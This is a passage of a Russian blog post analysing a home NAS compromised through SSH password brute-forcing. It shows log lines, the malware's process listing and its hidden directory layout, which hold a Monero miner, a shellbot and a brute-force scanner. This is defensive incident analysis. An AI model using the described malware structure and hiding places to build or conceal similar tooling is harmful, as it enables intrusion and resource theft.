{"id":296720,"date":"2020-01-03T21:00:05","date_gmt":"2020-01-03T21:00:05","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=296720"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=296720","title":{"rendered":"\u0422\u0430\u0439\u043d\u0430\u044f \u0436\u0438\u0437\u043d\u044c Linux \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0438\u043b\u0438 \u0432\u0435\u0435\u0440\u043d\u0430\u044f \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0443 SSH"},"content":{"rendered":"\n<div class=\"post__text post__text-html js-mediator-article\" id=\"post-content-body\" data-io-article-url=\"https:\/\/habr.com\/ru\/post\/482784\/\">\n<p>\u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u043e\u0439 \u0432\u043d\u0435\u0448\u043d\u0438\u0439 IP \u0431\u044b\u043b \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043d \u0432 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 IVI \u0441 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435\u043c<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">\u0412\u0430\u0448 ip-\u0430\u0434\u0440\u0435\u0441 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0430\u043d\u043e\u043d\u0438\u043c\u043d\u044b\u0439.  \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u0435\u0441\u044c \u043a \u0441\u0432\u043e\u0435\u043c\u0443 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0443. IP \u0430\u0434\u0440\u0435\u0441 &lt;IP&gt;. 
\u0414\u0430\u043d\u043d\u044b\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b maxmind.com<\/code><\/pre>\n<p><a name=\"habracut\"><\/a>  <\/p>\n<h2 id=\"chto-eto-znachit\">\u0427\u0442\u043e \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442?<\/h2>\n<p>  <\/p>\n<p>\u0412 \u0431\u0430\u0437\u0435 \u0437\u043d\u0430\u043d\u0438\u0439 IVI \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 <a href=\"https:\/\/ask.ivi.ru\/knowledge-bases\/2\/articles\/32993-oshibka-4530\">\u043e\u0448\u0438\u0431\u043a\u0435 4530<\/a>, \u043f\u043e\u044f\u0441\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0433\u043b\u0430\u0441\u0438\u0442, \u0447\u0442\u043e \u043d\u0430 IP \u0430\u0434\u0440\u0435\u0441\u0435 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d VPN \u0438\u043b\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0439 \u043f\u0440\u043e\u043a\u0441\u0438. \u041d\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u044f \u0441\u043e\u0437\u043d\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u0435 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u043b. 
\u041c\u043d\u0435 \u0441\u0442\u0430\u043b\u043e \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u043c\u043e\u0439 \u0440\u043e\u0443\u0442\u0435\u0440 \u0438\u043b\u0438 NAS, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u043b \u0432 \u0441\u0435\u0442\u044c, \u0443\u0447\u0430\u0441\u0442\u0432\u0443\u044e\u0442 \u0432 \u043a\u0430\u043a\u0438\u0445-\u0442\u043e \u043d\u0435\u043f\u0440\u0438\u0441\u0442\u043e\u0439\u043d\u043e\u0441\u0442\u044f\u0445.<\/p>\n<p>  <\/p>\n<h1 id=\"diskleymer\">\u0414\u0438\u0441\u043a\u043b\u0435\u0439\u043c\u0435\u0440<\/h1>\n<p>  <\/p>\n<p><em>\u041c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u044b, \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u0435 \u043d\u0438\u0436\u0435, \u043d\u0435\u0441\u0443\u0442 \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u0430\u0443\u0447\u043d\u043e-\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440. 
\u0414\u0430\u043d\u043d\u043e\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043b\u043e\u0441\u044c \u0430\u0432\u0442\u043e\u0440\u043e\u043c \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432 \u043d\u0430\u0443\u0447\u043d\u043e-\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0446\u0435\u043b\u044f\u0445, \u0435\u0433\u043e \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b \u043d\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0438 \u043d\u0435 \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u0438\u0437\u043d\u0430\u0432\u0430\u0442\u044c\u0441\u044f \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e\u043c \u043a \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044e \u043a\u0430\u043a\u0438\u0445-\u043b\u0438\u0431\u043e \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u043f\u0440\u0430\u0432\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439. \u041f\u0440\u0438 \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0430\u0432\u0442\u043e\u0440 \u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0437\u0430\u043a\u043e\u043d\u043e\u0434\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438. 
\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u0432 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u043e\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432 \u043d\u0430\u0443\u0447\u043d\u043e-\u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0446\u0435\u043b\u044f\u0445. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u0432 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u043f\u0440\u0430\u0432\u043d\u043e\u0433\u043e \u0438\u043b\u0438 \u043b\u044e\u0431\u043e\u0433\u043e \u0438\u043d\u043e\u0433\u043e \u043e\u0442 \u043d\u0430\u0443\u0447\u043d\u043e\u0439 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0432\u043b\u0435\u0447\u044c \u0437\u0430 \u0441\u043e\u0431\u043e\u0439 \u0443\u0433\u043e\u043b\u043e\u0432\u043d\u0443\u044e, \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u0438 (\u0438\u043b\u0438) \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0441\u043a\u043e-\u043f\u0440\u0430\u0432\u043e\u0432\u0443\u044e \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u044c. 
\u0410\u0432\u0442\u043e\u0440 \u043d\u0435 \u043d\u0435\u0441\u0435\u0442 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0437\u0430 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u044b \u0432 \u0441\u0444\u0435\u0440\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0438\u043c\u0435\u044e\u0449\u0438\u0435 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0435 \u043a \u0442\u0435\u043c\u0430\u0442\u0438\u043a\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f.<\/em><\/p>\n<p>  <\/p>\n<h2 id=\"razbiraemsya-chto-zhe-proizoshlo\">\u0420\u0430\u0437\u0431\u0438\u0440\u0430\u0435\u043c\u0441\u044f \u0447\u0442\u043e \u0436\u0435 \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u043b\u043e<\/h2>\n<p>  <\/p>\n<p>\u041f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e \u0438 \u043b\u043e\u0433\u0438 \u0440\u043e\u0443\u0442\u0435\u0440\u0430, \u044f \u0443\u0431\u0435\u0434\u0438\u043b\u0441\u044f \u0447\u0442\u043e \u043e\u043d \u0447\u0438\u0441\u0442, \u0430 \u043c\u043e\u0439 NAS \u0441\u0442\u043e\u0438\u0442 \u0432 \u0440\u0435\u0436\u0438\u043c\u0435 DMZ. \u042f \u0437\u0430\u0448\u0435\u043b \u043d\u0430 NAS \u0438 \u043f\u0435\u0440\u0432\u044b\u043c \u0434\u0435\u043b\u043e\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u043b \u0441\u0442\u043e\u0438\u0442 \u043b\u0438 \u043d\u0430 \u043d\u0435\u043c fail2ban \u0438 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d \u043b\u0438 ufw. 
\u041d\u0438 \u0442\u043e\u0433\u043e \u043d\u0438 \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u044f \u043d\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b, \u0430 <code>auth.log<\/code> \u0431\u044b\u043b \u0432\u043d\u0443\u0448\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0440\u0430\u0437\u043c\u0435\u0440\u0430. \u041f\u043e\u0445\u043e\u0436\u0435, \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u043c \u0430\u0442\u0430\u043a\u0438 \u0441\u0442\u0430\u043b \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u043f\u0430\u0440\u043e\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0447\u0435\u0440\u0435\u0437 ssh.<\/p>\n<p>  <\/p>\n<p>\u0417\u0430\u043f\u0443\u0441\u0442\u0438\u0432 <code>grep -in Accept \/var\/log\/auth.log<\/code>, \u044f \u0443\u0432\u0438\u0434\u0435\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">98341:Dec 23 23:45:36 fileserver sshd[23179]: Accepted password for timemachine from 46.101.149.19 port 45573 ssh2<\/code><\/pre>\n<p>  <\/p>\n<p>\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0432\u043e\u0448\u0435\u043b \u043f\u043e\u0434 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c timemachine \u0441 IP \u0430\u0434\u0440\u0435\u0441\u0430 46.101.149.19 \u0432\u043e \u0424\u0440\u0430\u043d\u043a\u0444\u0443\u0440\u0442\u0435. \u041f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u0447\u0442\u043e \u0441\u0442\u0440\u043e\u043a\u0430 \u043f\u043e\u043f\u0430\u043b\u0430\u0441\u044c \u0432 \u043b\u043e\u0433\u0435 \u0432\u0441\u0435\u0433\u043e \u043e\u0434\u0438\u043d \u0440\u0430\u0437, \u043f\u043e\u0447\u0442\u0438 \u043d\u0435\u0434\u0435\u043b\u044e \u043d\u0430\u0437\u0430\u0434. \u041e\u0434\u043d\u0430\u043a\u043e. 
\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f. \u0412\u044b\u0437\u043e\u0432<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">ps -aux | grep timema<\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u041f\u043e\u043a\u0430\u0437\u0430\u043b \u0442\u0430\u043a\u043e\u0439 \u043d\u0430\u0431\u043e\u0440 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">timemac+  3512  123 13.3 302904 267484 ?       Ssl  Dec25 4728:49 .\/cron timemac+  3590  0.0  0.1  12884  3232 ?        S    Dec25   0:00 \/bin\/bash .\/go timemac+ 17476  0.0  0.0  11740   924 ?        S    13:47   0:00 timeout 6h .\/tsm -t 301 -f 1 -s 12 -S 12 -p 0 -P 0 -d 1 p ip timemac+ 17477  0.0  0.1  12884  3036 ?        S    13:47   0:00 \/bin\/bash .\/tsm -t 301 -f 1 -s 12 -S 12 -p 0 -P 0 -d 1 p ip timemac+ 17482  112  2.4 3500784 49616 ?       Sl   13:47 146:11 \/dev\/shm\/.lwp\/.rsync\/c\/lib\/64\/tsm --library-path \/dev\/shm\/.lwp\/.rsync\/c\/lib\/64\/ \/usr\/sbin\/httpd sync\/c\/tsm64 -t 301 timemac+ 23184  0.0  0.3  76764  7288 ?        Ss   Dec23   0:00 \/lib\/systemd\/systemd --user timemac+ 23185  0.0  0.1 206708  2204 ?        S    Dec23   0:00 (sd-pam) timemac+ 24436  0.0  0.3  27412  6672 ?        S    Dec24   1:49 rsync timemac+  3512  123 13.3 302904 267484 ?       Ssl  Dec25 4728:51 .\/cron timemac+  3590  0.0  0.1  12884  3232 ?        S    Dec25   0:00 \/bin\/bash .\/go timemac+ 17476  0.0  0.0  11740   924 ?        S    13:47   0:00 timeout 6h .\/tsm -t 301 -f 1 -s 12 -S 12 -p 0 -P 0 -d 1 p ip timemac+ 17477  0.0  0.1  12884  3036 ?        
S    13:47   0:00 \/bin\/bash .\/tsm -t 301 -f 1 -s 12 -S 12 -p 0 -P 0 -d 1 p ip timemac+ 17482  112  2.4 3500784 49628 ?       Sl   13:47 146:15 \/dev\/shm\/.lwp\/.rsync\/c\/lib\/64\/tsm --library-path \/dev\/shm\/.lwp\/.rsync\/c\/lib\/64\/ \/usr\/sbin\/httpd sync\/c\/tsm64 -t 301 -f 1 -s 12 -S 12 -p 0 -P 0 -d 1 p ip timemac+ 23184  0.0  0.3  76764  7288 ?        Ss   Dec23   0:00 \/lib\/systemd\/systemd --user timemac+ 23185  0.0  0.1 206708  2204 ?        S    Dec23   0:00 (sd-pam) timemac+ 24436  0.0  0.3  27412  6672 ?        S    Dec24   1:49 rsync<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u041f\u043e\u0445\u043e\u0436\u0435, \u0432\u0441\u0435 \u043f\u0443\u0442\u0438 \u0432\u0435\u0434\u0443\u0442 \u0432 <code>\/dev\/shm\/.lwp<\/code>. \u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0447\u0442\u043e \u0442\u0430\u043c.<\/p>\n<p>  <\/p>\n<h2 id=\"struktura-malvari\">\u0421\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u043c\u0430\u043b\u0432\u0430\u0440\u0438<\/h2>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043d\u0430\u043f\u0448\u043e\u0442 \u0440\u0430\u0431\u043e\u0447\u0435\u0439 \u043f\u0430\u043f\u043a\u0438<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">\/dev\/shm\/.lwp \u251c\u2500\u2500 apt.conf \u251c\u2500\u2500 dota3.tar.gz \u251c\u2500\u2500 .out \u251c\u2500\u2500 .rsync \u2502\u00a0\u00a0 \u251c\u2500\u2500 a \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 a \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 anacron \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 bash.pid \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 cron \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 dir.dir \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 init0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 .procs \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 run \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 stop 
\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 upd \u2502\u00a0\u00a0 \u251c\u2500\u2500 b \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 a \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 dir.dir \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 run \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 stop \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 sync \u2502\u00a0\u00a0 \u251c\u2500\u2500 c \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 a \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 aptitude \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 b \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 cron.d \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 dir2.dir \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 dir.dir \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 go \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 golan \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 ip \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 lib \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 32 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libc.so.6 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libdl.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libnss_dns.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libnss_files.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libpthread.so.0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libresolv-2.23.so \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libresolv.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 
\u2514\u2500\u2500 tsm \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 64 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libc.so.6 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libdl.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libnss_dns.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libnss_files.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libpthread.so.0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libresolv-2.23.so \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libresolv.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 tsm \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 arm \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libarmmem-v7l.so \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libc.so.6 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libdl.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libnss_dns.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libpthread.so.0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libresolv.so \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libresolv.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u2514\u2500\u2500 tsm \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 n \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 p \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 run \u2502\u00a0\u00a0 
\u2502\u00a0\u00a0 \u251c\u2500\u2500 slow \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 start \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 stop \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 tsm \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 tsm32 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 tsm64 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 tsmv7 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 v \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 watchdog \u2502\u00a0\u00a0 \u251c\u2500\u2500 cron.d \u2502\u00a0\u00a0 \u251c\u2500\u2500 dir.dir \u2502\u00a0\u00a0 \u251c\u2500\u2500 init \u2502\u00a0\u00a0 \u251c\u2500\u2500 init2 \u2502\u00a0\u00a0 \u251c\u2500\u2500 initall \u2502\u00a0\u00a0 \u2514\u2500\u2500 .out \u2514\u2500\u2500 timemachine  8 directories, 70 files<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u0423 \u0442\u0440\u043e\u044f\u043d\u0430 \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u0434\u0435\u043b\u0438\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0447\u0430\u0441\u0442\u0438 <\/p>\n<p>  <\/p>\n<ul>\n<li>\u041c\u0430\u0439\u043d\u0435\u0440 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b <a href=\"https:\/\/github.com\/xmrig\/xmrig\">XMRIG<\/a> (.rsync\/a)<\/li>\n<li>\u0428\u0435\u043b\u043b\u0431\u043e\u0442 (.rsync\/b)<\/li>\n<li>\u0421\u043a\u0430\u043d\u0435\u0440-\u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441\u0435\u0440 (.rsync\/c)<\/li>\n<li>\u041b\u0430\u043d\u0447\u0435\u0440 (.rsync\/init \u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f)<\/li>\n<\/ul>\n<p>  <\/p>\n<h3 id=\"mayner\">\u041c\u0430\u0439\u043d\u0435\u0440<\/h3>\n<p>  <\/p>\n<p>\u041a\u0430\u0441\u0442\u043e\u043c\u043d\u0430\u044f \u0441\u0431\u043e\u0440\u043a\u0430 XMRIG. 
\u0421\u043e\u0431\u0440\u0430\u043d \u043f\u043e\u0434 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u044b <code>x86<\/code> \u0438 <code>x64<\/code>. \u0412\u0441\u044f \u043a\u0430\u0441\u0442\u043e\u043c\u043d\u043e\u0441\u0442\u044c \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0435, \u0437\u0430\u0448\u0438\u0442\u043e\u043c \u0432 \u0431\u0438\u043d\u0430\u0440\u043d\u0438\u043a. \u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0435\u0433\u043e \u0434\u043e\u0441\u0442\u0430\u0442\u044c \u0438 \u043f\u043e\u043d\u044f\u0442\u044c, \u043d\u0430 \u043a\u043e\u0433\u043e \u0442\u0440\u0443\u0434\u0438\u043b\u0430\u0441\u044c \u043c\u043e\u044f \u043c\u0430\u0448\u0438\u043d\u043a\u0430. \u0423 XMRIG \u0435\u0441\u0442\u044c <a href=\"https:\/\/xmrig.com\/wizard\">\u043a\u043e\u043d\u0441\u0442\u0440\u0443\u043a\u0442\u043e\u0440 \u043a\u043e\u043d\u0444\u0438\u0433\u043e\u0432<\/a>. \u041d\u0430\u0449\u0451\u043b\u043a\u0430\u0435\u043c \u043b\u044e\u0431\u0443\u044e \u043f\u0440\u043e\u0441\u0442\u0443\u044e \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e. 
